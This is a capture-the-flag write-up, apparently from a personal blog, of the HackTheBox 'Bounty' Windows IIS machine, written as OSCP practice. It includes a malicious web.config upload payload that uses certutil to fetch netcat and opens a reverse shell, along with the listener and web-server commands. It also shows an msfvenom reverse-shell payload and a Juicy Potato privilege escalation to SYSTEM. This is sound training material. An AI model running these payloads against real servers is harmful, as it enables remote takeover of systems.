HackTheBox | Bounty

HackTheBox | Bounty
HackTheBox | Bounty
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.92 scan initiated Mon Sep 12 23:54:35 2022 as: nmap -Pn -p- -A -T5 -oN scan.txt
Nmap scan report for
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
1   14.71 ms
2   14.80 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 12 23:55:43 2022 -- 1 IP address (1 host up) scanned in 68.45 seconds

Service Enumeration


Gobuster Enumeration

gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,asp -r -o gobuster80.txt -t 50

/aspnet_client        (Status: 403) [Size: 1233]
/transfer.aspx        (Status: 200) [Size: 941] 
/uploadedfiles        (Status: 403) [Size: 1233]

File Upload Vulnerability Testing

I try uploading a test .txt file and receive an error.

Then, I try uploading a .jpg file and it accepts it.

Then, I test on a .txt.jpg file and it accepts it. It does not accept, however, a .jpg.txt file, so it definitely appears to be validating on the last part of the file extension.

I've found my file upload in the /uploadedfiles/ directory. Now, from here, it's a matter of finding the right payload to go form file upload to reverse shell. There also appears to be a script running that clears uploaded files at regular intervals.

Null Byte Termination

I am going to try and get a reverse shell using this payload here:

aspx-reverse-shell/shell.aspx at master · borjmz/aspx-reverse-shell
Aspx reverse shell. Contribute to borjmz/aspx-reverse-shell development by creating an account on GitHub.

You'll need to change the payload according to your VPN IP address and desired TCP listening port.

    String host = "10.10.x.x"; //CHANGE THIS
    Int port = 443; ////CHANGE THIS

I save the payload in the file pwn.aspx. The null byte terminator works by appending a %00 which should cause the server to discontinue parsing the rest of the filename once loaded.

I load Burp Suite and proxy the requests through.

Catch the Request

Modify It

Now, you can forward the request on from Burp. And, you can see that this causes the server to accept the payload.

But, despite my best attempts, the file is either being deleted by a script or anti-virus, as the file is never found. It's also possible the %00 terminator is being treated literally by the server.

Testing for Approved File Extensions

Using this list here, I decide to test for common file extensions that are common on IIS systems.

IIS Hardening - File Extensions - Peter Hahndorf
IIS Hardening - File Extensions

I wrote a custom PowerShell script to automate the testing process:

CTF-Scripts/Test-FileUpload.ps1 at main · 0xBEN/CTF-Scripts
Contribute to 0xBEN/CTF-Scripts development by creating an account on GitHub.

With the help of my PowerShell script, I easily identify file types the server accepts:

The .config file type is definitely the outlier here. Time to look for IIS exploits that might be possible using a .config file.


This IIS server has a file upload vulnerability where the developer implemented a whitelist of file types — intending to limit the upload of images — but failed to filter out the .config file extension. Any file uploaded by the user is placed in the /UploadedFiles/ directory, meaning that the user can cause the server to load and parse a malicious web.config file in the readable directory.


I used this GitHub gist as inspriation to create my own payload.

Click to Show Code
<?xml version="1.0" encoding="UTF-8"?>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
               <remove fileExtension=".config" />
               <remove segment="web.config" />
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c certutil.exe -urlcache -split -f C:\Windows\Temp\nc.exe")
objShell.Exec("cmd.exe /c C:\Windows\Temp\nc.exe 443 -e C:\Windows\System32\cmd.exe")


The malicious web.config file is executing two commands on the remote host:

  1. Download nc.exe from a web server hosted on Kali
  2. Run nc.exe after it has been downloaded on the remote host

Copy nc.exe to the Current Directory

cp /usr/share/windows-resources/binaries/nc.exe .

Use the nc.exe binary shipped with Kali

Start a Python Web Server

This will host the nc.exe file via an ad-hoc web server, so the target will download it from our web server when the web.config file is run.

sudo python3 -m http.server 80

Start a Netcat Listener to Catch the Reverse Shell

In the web.config file, the remote host will run nc.exe and connect back to our listener. Then, when the connection is established, the cmd.exe binary will execute, giving us an interactive shell.

sudo rlwrap nc -lnvp 443

Upload web.config to the Target and Execute

You can do this two ways:

  1. Use your browser, upload the file, and load it from
  2. Or, use a helper script to streamline the process.

I am going to go with option 2 and use a PowerShell script I wrote to upload the file and load it on the target. This is just a modified script of our earlier one before.

CTF-Scripts/Get-WebConfigShell.ps1 at main · 0xBEN/CTF-Scripts
Contribute to 0xBEN/CTF-Scripts development by creating an account on GitHub.

Post-Exploit Enumeration

Current User

Click to expand

User Name     SID                                           
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000


Group Name                           Type             SID                                                           Attributes                                        
==================================== ================ ============================================================= ==================================================
Everyone                             Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool           Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                  Mandatory group, Enabled by default, Enabled group


Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

OS & Kernel

Click to expand
t Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          2/17/2023, 7:51:28 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,618 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,644 MB
Virtual Memory: In Use:    451 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)


Click to expand
User accounts for \\BOUNTY

Administrator            Guest                    merlin


Click to expand
Aliases for \\BOUNTY

*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . :
   Subnet Mask . . . . . . . . . . . :
   Default Gateway . . . . . . . . . :

Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

ARP Table


Open Ports
  TCP                 LISTENING       4
  TCP                LISTENING       676
  TCP                LISTENING       4
  TCP              LISTENING       4
  TCP              LISTENING       360
  TCP              LISTENING       760
  TCP              LISTENING       800
  TCP              LISTENING       464
  TCP              LISTENING       472
  TCP              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       676
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       360
  TCP    [::]:49153             [::]:0                 LISTENING       760
  TCP    [::]:49154             [::]:0                 LISTENING       800
  TCP    [::]:49155             [::]:0                 LISTENING       464
  TCP    [::]:49156             [::]:0                 LISTENING       472

Ping Sweep


Click to expand
No interesting processes


Click to expand
Not permitted to query services

Scheduled Tasks

Click to expand
No interesting tasks

Interesting Files


The actual list of approved file types

String path = Server.MapPath("~/UploadedFiles/");
string[] validFileTypes={"config","gif","png","jpg","jpeg","doc","docx","xls","xlsx"};

Privilege Escalation

During the post-exploit enumeration, one of the first things that stood out to me was the SeImpersonatePrivilelge privilege and the age of the operating system, Windows Server 2008 R2; sounds like the perfect candidate for Juicy Potato.

Download Juicy Potato

Juicy-Potato/jp.exe at main · k4sth4/Juicy-Potato
Windows Privilege Escalation . Contribute to k4sth4/Juicy-Potato development by creating an account on GitHub.

Generate a Privilege Escalation Payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.x.x LPORT=443 -f exe -o privesc.exe

Transfer the Files to the Target

sudo python3 -m http.server 80

Host the files with a Python web server

cd C:\Users\Merlin\Desktop
certutil -urlcache -split -f http://10.10.x.x/privesc.exe privesc.exe
certutil -urlcache -split -f http://10.10.x.x/jp.exe jp.exe

Download the privesc payload and JuicyPotato binaries to Merlin's desktop

Start a Netcat Listener and Execute the Payload

Find a Working CLSID for JuicyPotato

These are known COM object IDs running on Windows Server 2008 R2:

Windows Server 2008 R2 Enterprise
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

You can also try running the CLSID enumeration script. I tried a handful of CLSIDs listed here and had luck with this one:


Start a Listener

sudo rlwrap nc -lnvp 443

Execute the Juicy Potato Attack

set clsid={4991d34b-80a1-4291-83b6-3328366b9097}
.\jp.exe -p C:\Users\merlin\Desktop\privesc.exe -l 4000 -t * -c %clsid%

listen in the screenshot below is just aliased to sudo rlwrap nc -lnvp.



More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.